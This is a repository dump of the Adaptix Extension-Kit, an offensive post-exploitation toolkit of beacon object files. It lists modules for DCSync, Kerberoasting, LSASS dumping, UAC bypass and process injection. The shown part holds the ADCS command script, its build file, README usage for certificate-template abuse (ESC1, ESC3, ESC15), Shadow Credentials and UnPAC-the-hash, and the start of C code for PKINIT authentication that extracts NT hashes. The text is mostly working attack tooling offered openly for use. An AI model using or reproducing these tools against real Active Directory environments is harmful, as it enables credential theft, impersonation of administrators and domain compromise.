Repository: Adaptix-Framework/Extension-Kit
Branch: main
Commit: 9413caf85fd8
Files: 444
Total size: 9.6 MB

Directory structure:
gitextract_l_k0_oet/

├── .gitignore
├── AD-BOF/
│   ├── ADCS-BOF/
│   │   ├── ADCS.axs
│   │   ├── Makefile
│   │   ├── README.md
│   │   └── src/
│   │       ├── auth/
│   │       │   └── certi_auth.c
│   │       ├── enum/
│   │       │   ├── adcs_enum_com2.c
│   │       │   ├── adcs_enum_com2.h
│   │       │   ├── base.c
│   │       │   ├── certenroll.h
│   │       │   └── entry.c
│   │       ├── request/
│   │       │   ├── CertCli.h
│   │       │   ├── CertPol.h
│   │       │   ├── adcs_request.c
│   │       │   ├── adcs_request.h
│   │       │   ├── base.c
│   │       │   ├── certca.h
│   │       │   ├── certenroll.h
│   │       │   └── entry.c
│   │       ├── request_on_behalf/
│   │       │   ├── CertCli.h
│   │       │   ├── CertPol.h
│   │       │   ├── base.c
│   │       │   ├── certenroll.h
│   │       │   └── entry.c
│   │       └── shadow/
│   │           └── certi_shadow.c
│   ├── CMakeLists.txt
│   ├── DCSync-BOF/
│   │   ├── LICENSE
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── _include/
│   │   │   ├── beacon.h
│   │   │   ├── dcsync.h
│   │   │   └── ldap_common.h
│   │   ├── drsuapi/
│   │   │   ├── ms-drsr-custom.c
│   │   │   └── ms-drsr.h
│   │   ├── src/
│   │   │   ├── dcsync-all.c
│   │   │   └── dcsync-single.c
│   │   └── util/
│   │       ├── ldap_common.c
│   │       ├── ldap_syncall.c
│   │       └── rpc-adapter.c
│   ├── Kerbeus-BOF/
│   │   ├── CMakeLists.txt
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── _include/
│   │   │   ├── asn_convert.c
│   │   │   ├── asn_decode.c
│   │   │   ├── asn_encode.c
│   │   │   ├── beacon.h
│   │   │   ├── connection.c
│   │   │   ├── crypt_b64.c
│   │   │   ├── crypt_checksum.c
│   │   │   ├── crypt_dec.c
│   │   │   ├── crypt_enc.c
│   │   │   ├── crypt_key.c
│   │   │   ├── functions.c
│   │   │   └── kerb_struct.h
│   │   ├── asktgs/
│   │   │   └── asktgs.c
│   │   ├── asktgt/
│   │   │   └── asktgt.c
│   │   ├── asreproasting/
│   │   │   └── asreproasting.c
│   │   ├── changepw/
│   │   │   └── changepw.c
│   │   ├── describe/
│   │   │   └── describe.c
│   │   ├── hash/
│   │   │   └── hash.c
│   │   ├── kerberoasting/
│   │   │   └── kerberoasting.c
│   │   ├── kerbeus.axs
│   │   ├── klist/
│   │   │   └── klist.c
│   │   ├── ptt/
│   │   │   └── ptt.c
│   │   ├── purge/
│   │   │   └── purge.c
│   │   ├── renew/
│   │   │   └── renew.c
│   │   ├── s4u/
│   │   │   ├── cross_s4u.c
│   │   │   └── s4u.c
│   │   └── tgtdeleg/
│   │       └── tgtdeleg.c
│   ├── LDAP-BOF/
│   │   ├── CMakeLists.txt
│   │   ├── LDAP.axs
│   │   ├── LICENSE
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── _include/
│   │   │   ├── acl_common.h
│   │   │   ├── beacon.h
│   │   │   └── ldap_common.h
│   │   └── src/
│   │       ├── add/
│   │       │   ├── add-ace.c
│   │       │   ├── add-attribute.c
│   │       │   ├── add-computer.c
│   │       │   ├── add-delegation.c
│   │       │   ├── add-group.c
│   │       │   ├── add-groupmember.c
│   │       │   ├── add-ou.c
│   │       │   ├── add-rbcd.c
│   │       │   ├── add-sidhistory.c
│   │       │   ├── add-spn.c
│   │       │   ├── add-uac.c
│   │       │   └── add-user.c
│   │       ├── common/
│   │       │   ├── acl_common.c
│   │       │   └── ldap_common.c
│   │       ├── get/
│   │       │   ├── get-acl.c
│   │       │   ├── get-attribute.c
│   │       │   ├── get-computers.c
│   │       │   ├── get-delegation.c
│   │       │   ├── get-domaininfo.c
│   │       │   ├── get-groupmembers.c
│   │       │   ├── get-groups.c
│   │       │   ├── get-maq.c
│   │       │   ├── get-object.c
│   │       │   ├── get-rbcd.c
│   │       │   ├── get-spn.c
│   │       │   ├── get-uac.c
│   │       │   ├── get-usergroups.c
│   │       │   ├── get-users.c
│   │       │   └── get-writable.c
│   │       ├── move/
│   │       │   └── move-object.c
│   │       ├── remove/
│   │       │   ├── remove-ace.c
│   │       │   ├── remove-attribute.c
│   │       │   ├── remove-delegation.c
│   │       │   ├── remove-groupmember.c
│   │       │   ├── remove-object.c
│   │       │   ├── remove-rbcd.c
│   │       │   ├── remove-spn.c
│   │       │   └── remove-uac.c
│   │       └── set/
│   │           ├── set-attribute.c
│   │           ├── set-delegation.c
│   │           ├── set-owner.c
│   │           ├── set-password.c
│   │           ├── set-spn.c
│   │           └── set-uac.c
│   ├── Makefile
│   ├── README.md
│   ├── RelayInformer/
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── RelayInformer.axs
│   │   ├── common/
│   │   │   ├── base.c
│   │   │   ├── beacon.h
│   │   │   ├── bofdefs.h
│   │   │   ├── hwbp.c
│   │   │   └── sql.c
│   │   ├── relay-informer-http/
│   │   │   └── entry.c
│   │   ├── relay-informer-ldap/
│   │   │   └── entry.c
│   │   ├── relay-informer-mssql/
│   │   │   └── entry.c
│   │   └── relay-informer-smb/
│   │       └── entry.c
│   ├── SQL-BOF/
│   │   ├── CMakeLists.txt
│   │   ├── LICENSE
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── SQL.axs
│   │   └── src/
│   │       ├── SQL/
│   │       │   ├── 1434udp/
│   │       │   │   └── entry.c
│   │       │   ├── adsi/
│   │       │   │   ├── entry.c
│   │       │   │   └── ldapserver.h
│   │       │   ├── agentcmd/
│   │       │   │   └── entry.c
│   │       │   ├── agentstatus/
│   │       │   │   └── entry.c
│   │       │   ├── checkrpc/
│   │       │   │   └── entry.c
│   │       │   ├── clr/
│   │       │   │   └── entry.c
│   │       │   ├── columns/
│   │       │   │   └── entry.c
│   │       │   ├── databases/
│   │       │   │   └── entry.c
│   │       │   ├── impersonate/
│   │       │   │   └── entry.c
│   │       │   ├── info/
│   │       │   │   └── entry.c
│   │       │   ├── links/
│   │       │   │   └── entry.c
│   │       │   ├── olecmd/
│   │       │   │   └── entry.c
│   │       │   ├── query/
│   │       │   │   └── entry.c
│   │       │   ├── rows/
│   │       │   │   └── entry.c
│   │       │   ├── search/
│   │       │   │   └── entry.c
│   │       │   ├── smb/
│   │       │   │   └── entry.c
│   │       │   ├── tables/
│   │       │   │   └── entry.c
│   │       │   ├── togglemodule/
│   │       │   │   └── entry.c
│   │       │   ├── users/
│   │       │   │   └── entry.c
│   │       │   ├── whoami/
│   │       │   │   └── entry.c
│   │       │   └── xpcmd/
│   │       │       └── entry.c
│   │       └── common/
│   │           ├── base.c
│   │           ├── beacon.h
│   │           ├── bofdefs.h
│   │           ├── sql.c
│   │           ├── sql_agent.c
│   │           ├── sql_clr.c
│   │           └── sql_modules.c
│   ├── WebDAVClient/
│   │   ├── EnableWebDAVClient.c
│   │   ├── LICENSE
│   │   ├── StatusWebDAVClient.c
│   │   └── beacon.h
│   ├── ad-services.axs
│   ├── ad.axs
│   ├── adwssearch/
│   │   ├── adws_parser.h
│   │   ├── adws_search.c
│   │   ├── nbfse.h
│   │   ├── nmf.h
│   │   └── nns.h
│   ├── badtakeover/
│   │   └── BadTakeover.c
│   ├── ldapsearch/
│   │   ├── base.c
│   │   └── ldapsearch.c
│   └── readlaps/
│       ├── base.c
│       └── readlaps.c
├── CMakeLists.txt
├── Creds-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── UnderlayCopy/
│   │   ├── README.md
│   │   ├── entry.c
│   │   └── underlaycopy.h
│   ├── askcreds/
│   │   ├── askcreds.c
│   │   └── askcreds.h
│   ├── cookie-monster/
│   │   ├── LICENSE
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── adaptix.h
│   │   ├── beacon.h
│   │   ├── cookie-monster-bof.c
│   │   ├── cookie-monster-bof.h
│   │   ├── cookie-monster.axs
│   │   ├── decrypt.py
│   │   └── requirements.txt
│   ├── creds.axs
│   ├── get-netntlm/
│   │   └── get-netntlm.c
│   ├── hashdump/
│   │   ├── hashdump.c
│   │   └── hive_parser.c
│   ├── lsadump/
│   │   ├── cache.c
│   │   ├── include/
│   │   │   ├── cache.h
│   │   │   ├── lsadump.h
│   │   │   ├── sam.h
│   │   │   └── secrets.h
│   │   ├── lsadump_helper.c
│   │   ├── sam.c
│   │   └── secrets.c
│   └── nanodump/
│       ├── LICENSE
│       ├── Makefile
│       ├── README.md
│       ├── include/
│       │   ├── adaptix.h
│       │   ├── beacon.h
│       │   ├── delete_file.h
│       │   ├── dinvoke.h
│       │   ├── entry.h
│       │   ├── handle.h
│       │   ├── hw_breakpoint.h
│       │   ├── impersonate.h
│       │   ├── malseclogon.h
│       │   ├── modules.h
│       │   ├── nanodump.h
│       │   ├── nanodump_ppl_dump_dll.x64.h
│       │   ├── nanodump_ppl_dump_dll.x86.h
│       │   ├── nanodump_ppl_medic_dll.x64.h
│       │   ├── nanodump_ssp_dll.x64.h
│       │   ├── nanodump_ssp_dll.x86.h
│       │   ├── ntdefs.h
│       │   ├── output.h
│       │   ├── pipe.h
│       │   ├── ppl/
│       │   │   ├── cleanup.h
│       │   │   ├── ppl.h
│       │   │   ├── ppl_dump.h
│       │   │   ├── ppl_medic.h
│       │   │   ├── ppl_medic_client.h
│       │   │   ├── ppl_medic_dll.h
│       │   │   └── ppl_utils.h
│       │   ├── shtinkering.h
│       │   ├── spoof_callstack.h
│       │   ├── ssp/
│       │   │   ├── ssp.h
│       │   │   └── ssp_utils.h
│       │   ├── ssp.h
│       │   ├── syscalls.h
│       │   ├── token_priv.h
│       │   ├── utils.h
│       │   └── werfault.h
│       ├── nanodump.axs
│       ├── scripts/
│       │   ├── randomize_sw2_seed.py
│       │   └── restore_signature
│       └── source/
│           ├── bin2c.c
│           ├── delete_file.c
│           ├── dinvoke.c
│           ├── entry.c
│           ├── handle.c
│           ├── hw_breakpoint-asm.asm
│           ├── hw_breakpoint.c
│           ├── impersonate.c
│           ├── malseclogon.c
│           ├── modules.c
│           ├── nanodump.c
│           ├── output.c
│           ├── pipe.c
│           ├── ppl/
│           │   ├── cleanup.c
│           │   ├── ppl.c
│           │   ├── ppl_dump.c
│           │   ├── ppl_medic.c
│           │   ├── ppl_medic_client.c
│           │   ├── ppl_medic_dll.c
│           │   └── ppl_utils.c
│           ├── restore_signature.c
│           ├── shtinkering.c
│           ├── spoof_callstack-asm.asm
│           ├── spoof_callstack.c
│           ├── ssp/
│           │   ├── ssp.c
│           │   └── ssp_utils.c
│           ├── syscalls-asm.asm
│           ├── syscalls.c
│           ├── token_priv.c
│           ├── utils.c
│           └── werfault.c
├── Dockerfile
├── Elevation-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── elevate.axs
│   ├── getsystem_token/
│   │   └── getsystem_token.c
│   ├── potato-dcom/
│   │   ├── DCOMPotato.cpp
│   │   └── bofdefs.h
│   ├── printspoofer/
│   │   └── printspoofer.c
│   ├── uac_regshellcmd/
│   │   └── RegistryShellCommandBOF.c
│   └── uac_sspi/
│       └── SspiUacBypassBOF.cpp
├── Execution-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── No-Consolation/
│   │   ├── LICENSE
│   │   ├── Makefile
│   │   ├── README.md
│   │   ├── include/
│   │   │   ├── apisetlookup.h
│   │   │   ├── beacon.h
│   │   │   ├── bofdefs.h
│   │   │   ├── console.h
│   │   │   ├── entry.h
│   │   │   ├── hwbp.h
│   │   │   ├── loader.h
│   │   │   ├── output.h
│   │   │   ├── peb.h
│   │   │   ├── runner.h
│   │   │   └── utils.h
│   │   ├── no_consolation.axs
│   │   └── source/
│   │       ├── apisetlookup.c
│   │       ├── console.c
│   │       ├── entry.c
│   │       ├── hwbp.c
│   │       ├── loader.c
│   │       ├── peb.c
│   │       ├── runner.c
│   │       └── utils.c
│   ├── README.md
│   ├── execute-assembly/
│   │   ├── inlineExecute-Assembly.c
│   │   └── inlineExecute-Assembly.h
│   └── execution.axs
├── Injection-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── inject.axs
│   ├── inject_32to64/
│   │   └── inject_32to64.c
│   ├── inject_cfg/
│   │   └── inject_cfg.c
│   ├── inject_poolparty/
│   │   ├── 1.h
│   │   ├── 2.h
│   │   ├── 3.h
│   │   ├── 4.h
│   │   ├── 5.h
│   │   ├── 6.h
│   │   ├── 7.h
│   │   ├── 8.h
│   │   ├── PoolParty.h
│   │   └── inject_poolparty.c
│   └── inject_sec/
│       ├── inject_sec.c
│       └── libc.h
├── LICENSE
├── LateralMovement-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── lateral.axs
│   ├── psexec/
│   │   └── psexec.c
│   ├── runas/
│   │   └── runas.c
│   ├── runas_sess_IHxExec/
│   │   ├── bofdefs.h
│   │   └── ihxexec.c
│   ├── scshell/
│   │   └── scshell.c
│   ├── token_make/
│   │   └── token_make.c
│   ├── token_steal/
│   │   └── token_steal.c
│   └── winrm-client/
│       └── winrm.cpp
├── Makefile
├── Postex-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── SauronEyeBOF/
│   │   ├── entry.c
│   │   └── sauroneye.h
│   ├── ScreenshotBOF/
│   │   └── entry.c
│   ├── firewallrule/
│   │   ├── addfirewallrule.c
│   │   └── firewallrule.h
│   └── postex.axs
├── Process-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── findobjects/
│   │   ├── FindModule.c
│   │   ├── FindObjects.h
│   │   ├── FindProcHandle.c
│   │   ├── Syscalls-WoW64.h
│   │   └── Syscalls.h
│   ├── process/
│   │   ├── Syscalls-WoW64.h
│   │   ├── Syscalls.h
│   │   ├── base.c
│   │   └── psc.c
│   ├── process.axs
│   └── procfreeze/
│       └── procfreeze.c
├── README.md
├── SAL-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── arp/
│   │   ├── arp.c
│   │   └── base.c
│   ├── cacls/
│   │   ├── base.c
│   │   ├── cacls.c
│   │   └── defines.h
│   ├── dir/
│   │   ├── base.c
│   │   ├── dir.c
│   │   └── queue.c
│   ├── env/
│   │   ├── base.c
│   │   └── env.c
│   ├── ipconfig/
│   │   ├── base.c
│   │   └── ipconfig.c
│   ├── listdns/
│   │   ├── base.c
│   │   └── listdns.c
│   ├── netstat/
│   │   ├── base.c
│   │   └── netstat.c
│   ├── nslookup/
│   │   ├── base.c
│   │   └── nslookup.c
│   ├── privcheck/
│   │   ├── alwaysinstallelevated.c
│   │   ├── autologon.c
│   │   ├── credentialmanager.c
│   │   ├── download_vulnerable_driver_list.py
│   │   ├── hijackablepath.c
│   │   ├── modifiableautorun.c
│   │   ├── modifiablesvc.c
│   │   ├── privcheck_all.c
│   │   ├── pshistory.c
│   │   ├── tokenprivileges.c
│   │   ├── uacstatus.c
│   │   ├── unattendfiles.c
│   │   ├── unquotedsvcpath.c
│   │   ├── vulndrivers.h
│   │   └── vulnerabledrivers.c
│   ├── routeprint/
│   │   ├── base.c
│   │   └── routeprint.c
│   ├── sal.axs
│   ├── uptime/
│   │   ├── base.c
│   │   └── uptime.c
│   ├── useridletime/
│   │   ├── base.c
│   │   └── useridletime.c
│   └── whoami/
│       ├── base.c
│       └── whoami.c
├── SAR-BOF/
│   ├── CMakeLists.txt
│   ├── Makefile
│   ├── README.md
│   ├── nbtscan/
│   │   ├── nbtscan.c
│   │   └── nbtscan.h
│   ├── quser/
│   │   ├── base.c
│   │   └── quser.c
│   ├── sar.axs
│   ├── smartscan/
│   │   └── portscan_simple.c
│   └── taskhound/
│       └── taskhound.c
├── _include/
│   ├── adaptix.h
│   ├── beacon.h
│   └── bofdefs.h
├── add_agent.sh
├── docker-compose.yml
└── extension-kit.axs

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
_bin
.vscode
.cache/jb
SAL-BOF/vulndrivers.h
Creds-BOF/nanodump/dist/

# macOS
.DS_Store
**/.DS_Store


================================================
FILE: AD-BOF/ADCS-BOF/ADCS.axs
================================================
var metadata = {
    name: "ADCS-BOF",
    description: "Active Directory Certificate Services Exploitation BOFs"
};

let _cmd_certi_auth = ax.create_command("auth", "Authenticate with certificate (PKINIT + UnPAC-the-hash)", "certi auth --cert MIIMcAIBAzCCDCwG....");
_cmd_certi_auth.addArgFlagString("--cert", "cert", "Base64 encoded PFX certificate", "");
_cmd_certi_auth.addArgFlagFile("--pfx", "pfx", false, "PFX certificate file");
_cmd_certi_auth.addArgFlagString("--password", "password", "PFX password", "");
_cmd_certi_auth.addArgFlagString("--dc", "dc", "Domain Controller address (auto-detected if not specified)", "");
_cmd_certi_auth.addArgBool("--no-unpac", "Only get TGT, don't extract NT hash");
_cmd_certi_auth.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let cert = parsed_json["cert"];
    let pfx = parsed_json["pfx"];
    let password = parsed_json["password"];
    let dc = parsed_json["dc"];
    let no_unpac = parsed_json["--no-unpac"] ? 1 : 0;

    if (!cert && !pfx) { throw new Error("Either --cert or --pfx must be specified"); }

    let bof_params = ax.bof_pack("cstr,cstr,cstr,bytes,short", [cert || "", password, dc, pfx || "", no_unpac]);
    let bof_path = ax.script_dir() + "_bin/ADCS/certi_auth." + ax.arch(id) + ".o";
    let message = "Task: Authenticate with certificate (PKINIT)";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



var _cmd_certi_enum = ax.create_command("enum", "Enumerate CAs and templates in the AD", "certi enum");
_cmd_certi_enum.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {

    let bof_path = ax.script_dir() + "_bin/ADCS/certi_enum." + ax.arch(id) + ".o";
    let message = "Task: Enumerate CAs and templates";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}"`, message );
});



var _cmd_certi_req = ax.create_command("request", "Request an enrollment certificate", "certi req --ca cert.example.org\\example-CERT-CA --template vulnTemplate --subject CN=Administrator,CN=Users,DC=example,DC=org --altname CN=second_adm,CN=Users,DC=example,DC=org --alturl tag:microsoft.com,2022-09-14:sid:S-1-5-21-3006160104-3291460162-27467737-1123");
_cmd_certi_req.addArgFlagString( "--ca",      "CA",       true, "The certificate authority to use");
_cmd_certi_req.addArgFlagString("--template", "template",       "The certificate type to request (else default for User/Machine)", "");
_cmd_certi_req.addArgFlagString("--subject",  "subject",        "The subject's distinguished name (else default for user/machine)", "");
_cmd_certi_req.addArgFlagString("--altname",  "altname",        "The alternate subject's distinguished name", "");
_cmd_certi_req.addArgFlagString("--alturl",   "alturl",         "SAN URL entry, can be used to specify the alternate subject's SID", "");
_cmd_certi_req.addArgFlagString("--pfx-password",   "password", "PFX certificate password", "");
_cmd_certi_req.addArgBool("--install", "Install the certificate in current context?");
_cmd_certi_req.addArgBool("--machine", "Request a certificate for a machine instead of a user?");
_cmd_certi_req.addArgBool("--policy",  "Adds App policy to allow client auth and Acting as a certificate agent (for ESC15)");
_cmd_certi_req.addArgBool("--dns",     "Subject Altname given as a DNS name (else: Subject alt name given as UPN)");
_cmd_certi_req.addArgBool("--pem", "Output in PEM format instead of PFX");
_cmd_certi_req.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {

    let ca       = "";
    let template = parsed_json["template"];
    let subject  = parsed_json["subject"];
    let altname  = parsed_json["altname"];
    let alturl   = parsed_json["alturl"];
    let password = parsed_json["password"];
    let install = 0;
    let machine = 0;
    let policy  = 0;
    let dns     = 0;
    let pem = 0;

    if("CA" in parsed_json) {
        ca = parsed_json["CA"];
    } else {
        throw new Error("Need to provide the Certificate Authority at a minimum");
    }

    if(parsed_json["--install"]) { install = 1; }
    if(parsed_json["--machine"]) { machine = 1; }
    if(parsed_json["--policy"]) { policy = 1; }
    if(parsed_json["--dns"]) { dns = 1; }
    if(parsed_json["--pem"]) { pem = 1; }

    let bof_params = ax.bof_pack("wstr,wstr,wstr,wstr,wstr,wstr,short,short,short,short,short", [ca, template, subject, altname, alturl, password, install, machine, policy, dns, pem ]);
    let bof_path = ax.script_dir() + "_bin/ADCS/certi_req." + ax.arch(id) + ".o";
    let message = "Task: Request certificate";

    ax.execute_alias( id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message );
});



let _cmd_certi_req_onbehalf = ax.create_command("request_on_behalf", "Request certificate on behalf of another user (ESC3)", "certi request_on_behalf cert.example.org\\example-CERT-CA vulnTemplate Administrator /tmp/ea.pfx");
_cmd_certi_req_onbehalf.addArgFlagString( "--ca",      "ca",       true, "The certificate authority to use");
_cmd_certi_req_onbehalf.addArgFlagString("--template", "template", true, "Certificate template name");
_cmd_certi_req_onbehalf.addArgFlagString("--target",   "target",   true, "Target user (DOMAIN\\username)");
_cmd_certi_req_onbehalf.addArgFlagFile("--ea-pfx",     "ea-pfx",  true, "Enrollment Agent certificate (PFX file)");
_cmd_certi_req_onbehalf.addArgFlagString("--ea-password", "ea_password", "Enrollment Agent PFX password", "");
_cmd_certi_req_onbehalf.addArgFlagString("--pfx-password", "pfx_password", "Output PFX password", "");
_cmd_certi_req_onbehalf.addArgBool("--pem", "Output in PEM format instead of PFX");
_cmd_certi_req_onbehalf.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let ca = parsed_json["ca"];
    let template = parsed_json["template"];
    let target = parsed_json["target"];
    let ea_cert = parsed_json["ea-pfx"];
    let ea_password = parsed_json["ea_password"];
    let pfx_password = parsed_json["pfx_password"];
    let pem = 0;
    if(parsed_json["--pem"]) { pem = 1; }

    let bof_params = ax.bof_pack("wstr,wstr,wstr,wstr,wstr,bytes,short", [ca, template, target, ea_password, pfx_password, ea_cert, pem]);
    let bof_path = ax.script_dir() + "_bin/ADCS/certi_req_onbehalf." + ax.arch(id) + ".o";
    let message = "Task: Request certificate on behalf of " + target;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});



let _cmd_certi_shadow = ax.create_command("shadow", "Shadow Credentials attack - write KeyCredentialLink and get certificate", "certi shadow --target Administrator");
_cmd_certi_shadow.addArgFlagString("--target", "target", true, "Target user (sAMAccountName)");
_cmd_certi_shadow.addArgFlagString("--domain", "domain", "Domain name (auto-detected if not specified)", "");
_cmd_certi_shadow.addArgBool("--no-write", "Don't write to AD, just generate certificate");
_cmd_certi_shadow.addArgBool("--clear", "Clear msDS-KeyCredentialLink (don't write new, only clear)");
_cmd_certi_shadow.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let target = parsed_json["target"];
    let domain = parsed_json["domain"];
    let no_write = parsed_json["--no-write"] ? 1 : 0;
    let clear = parsed_json["--clear"] ? 1 : 0;

    let bof_params = ax.bof_pack("cstr,cstr,short,short", [target, domain, no_write, clear]);
    let bof_path = ax.script_dir() + "_bin/ADCS/certi_shadow." + ax.arch(id) + ".o";
    let message = clear ? "Task: Clear Shadow Credentials from " + target + "@" + domain 
                        : "Task: Shadow Credentials attack on " + target + "@" + domain;

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, message);
});




var cmd_certi = ax.create_command("certi", "ADCS BOF");
cmd_certi.addSubCommands([ _cmd_certi_auth, _cmd_certi_enum, _cmd_certi_req, _cmd_certi_req_onbehalf, _cmd_certi_shadow ]);

var group_adcs = ax.create_commands_group("ADCS-BOF", [cmd_certi]);
ax.register_commands_group(group_adcs, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: AD-BOF/ADCS-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../../_include -w -Wno-incompatible-pointer-types -Os -s -DBOF -c

all: bof

bof:
	@(mkdir -p _bin/ADCS 2>/dev/null) && echo 'creating _bin/ADCS' || echo '_bin/ADCS exists'
	@($(CC64) $(CFLAGS) src/enum/entry.c -o _bin/ADCS/certi_enum.x64.o   && $(STRIP64) _bin/ADCS/certi_enum.x64.o) && echo '[+] enum' || echo '[!] enum'
	@($(CC64) $(CFLAGS) src/request/entry.c -o _bin/ADCS/certi_req.x64.o && $(STRIP64) _bin/ADCS/certi_req.x64.o)  && echo '[+] certi_req' || echo '[!] certi_req'
	@($(CC64) $(CFLAGS) src/request_on_behalf/entry.c -o _bin/ADCS/certi_req_onbehalf.x64.o && $(STRIP64) _bin/ADCS/certi_req_onbehalf.x64.o) && echo '[+] certi_req_onbehalf' || echo '[!] certi_req_onbehalf'
	@($(CC64) $(CFLAGS) src/auth/certi_auth.c -o _bin/ADCS/certi_auth.x64.o && $(STRIP64) _bin/ADCS/certi_auth.x64.o) && echo '[+] certi_auth' || echo '[!] certi_auth'
	@($(CC64) $(CFLAGS) src/shadow/certi_shadow.c -o _bin/ADCS/certi_shadow.x64.o && $(STRIP64) _bin/ADCS/certi_shadow.x64.o) && echo '[+] certi_shadow' || echo '[!] certi_shadow'

clean:
	@(rm -rf _bin)

================================================
FILE: AD-BOF/ADCS-BOF/README.md
================================================
# ADCS-BOF

A library of beacon object files to interact with ADCS servers and certificates.



## certi auth

Authenticate with certificate (PKINIT + UnPAC-the-hash)

```
certi auth <{--cert base64_cert} || {--pfx file.pfx}> [--password pfx_password] [--dc DC] [--no-unpac]
```

* `--cert` - Base64 encoded PFX certificate
* `--pfx` - PFX certificate file
* `--password` - PFX password
* `--dc` - Domain Controller address (auto-detected if not specified)
* `--no-unpac` - Only get TGT, don't extract NT hash



## certi enum

Enumerate CAs and templates in the AD

```
certi enum
```



## certi request

Request an enrollment certificate 

```
certi req <--ca CA> [--template Template] [--subject CN] [--altname CN] [--alturl tag:microsoft.com,2022-09-14:sid:<SID>] [--install] [--machine] [--policy] [--dns] [--pfx-password password] [--pem]
```

* `--ca` - The certificate authority to use
* `--template` - The certificate type to request (else default for User/Machine)
* `--subject` - The subject's distinguished name (else default for user/machine)
* `--altname` - The alternate subject's distinguished name
* `--alturl` - SAN URL entry, can be used to specify the alternate subject's SID
* `--install` - Install the certificate in current context?
* `--pfx-password` - Output PFX password
* `--machine` - Request a certificate for a machine instead of a user?
* `--policy` - Adds App policy to allow client auth and Acting as a certificate agent (for ESC15)
* `--dns` - Subject Altname given as a DNS name (else: Subject alt name given as UPN).
* `--pem` - Output in PEM format instead of PFX



## certi request_on_behalf

Request certificate on behalf of another user (ESC3)

```
certi request_on_behalf --ca <ca> --template <template> --target <target> --ea-pfx <cert> [--ea-password password] [--pfx-password password] [--pem]
```

* `--ca` - The certificate authority to use
* `--template` - The certificate type to request (else default for User/Machine)
* `--target` - Target user (DOMAIN\\username)
* `--altname` - The alternate subject's distinguished name
* `--ea-pfx` - Enrollment Agent certificate (PFX file
* `--ea-password` - Enrollment Agent PFX password
* `--pfx-password` - Output PFX password
* `--pem` - Output in PEM format instead of PFX



## certi shadow

Shadow Credentials attack - write KeyCredentialLink and get certificate

```
certi shadow --target <account> [--clear] [--domain domain] [--no-write]
```

* `--target` - Target user (sAMAccountName)
* `--clear` - Clear msDS-KeyCredentialLink (don't write new, only clear)
* `--domain` - Domain name (auto-detected if not specified)
* `--no-write` - Don't write to AD, just generate certificate



## References
- [https://github.com/trustedsec/CS-Remote-OPs-BOF](https://github.com/trustedsec/CS-Remote-OPs-BOF)
- [https://github.com/trustedsec/CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF)
- [https://github.com/RayRRT/ESC1-unPAC]
- [https://github.com/RayRRT/BOFs/tree/main/ShadowCreds-unPAC-BOF]

================================================
FILE: AD-BOF/ADCS-BOF/src/auth/certi_auth.c
================================================
#define WIN32_LEAN_AND_MEAN
#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#include <wincrypt.h>
#include <winldap.h>
#include <dsgetdc.h>
#include <lm.h>

#include "beacon.h"
#define CALLBACK_OUTPUT 0x0
#define CALLBACK_ERROR 0x0d

/* Missing COM type definitions for BOF mode */
typedef void* LPUNKNOWN;
typedef WCHAR OLECHAR;
typedef OLECHAR* LPOLESTR;
typedef OLECHAR* BSTR;

/* Kerberos Message Types */
#define KRB_AS_REQ      10
#define KRB_AS_REP      11
#define KRB_ERROR       30

/* PA-DATA Types */
#define PA_PK_AS_REQ    16
#define PA_PK_AS_REP    17
#define PA_PAC_CREDENTIALS 167

/* Encryption Types */
#define ETYPE_AES256_CTS_HMAC_SHA1  18
#define ETYPE_AES128_CTS_HMAC_SHA1  17
#define ETYPE_RC4_HMAC              23

/* Key Usage */
#define KRB_KEY_USAGE_AS_REP_ENCPART    3
#define KRB_KEY_USAGE_PAC_CREDENTIAL    16

/* Certificate Request */
#define CR_IN_BASE64    0x00000001
#define CR_IN_PKCS10    0x00000100
#define CR_OUT_BASE64   0x00000001
#define CR_DISP_INCOMPLETE          0
#define CR_DISP_ERROR               1
#define CR_DISP_DENIED              2
#define CR_DISP_ISSUED              3
#define CR_DISP_ISSUED_OUT_OF_BAND  4
#define CR_DISP_UNDER_SUBMISSION    5
#define CR_DISP_REVOKED             6

/* Base64 decoding flags - use ANY for flexibility with line breaks */
#ifndef CRYPT_STRING_BASE64_ANY
#define CRYPT_STRING_BASE64_ANY     0x00000006
#endif

/* MODP Group 2 - 1024 bit DH parameters (RFC 2409) */
static const BYTE DH_P_MODP2[] = {
    0x00,
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
    0xC9, 0x0F, 0xDA, 0xA2, 0x21, 0x68, 0xC2, 0x34,
    0xC4, 0xC6, 0x62, 0x8B, 0x80, 0xDC, 0x1C, 0xD1,
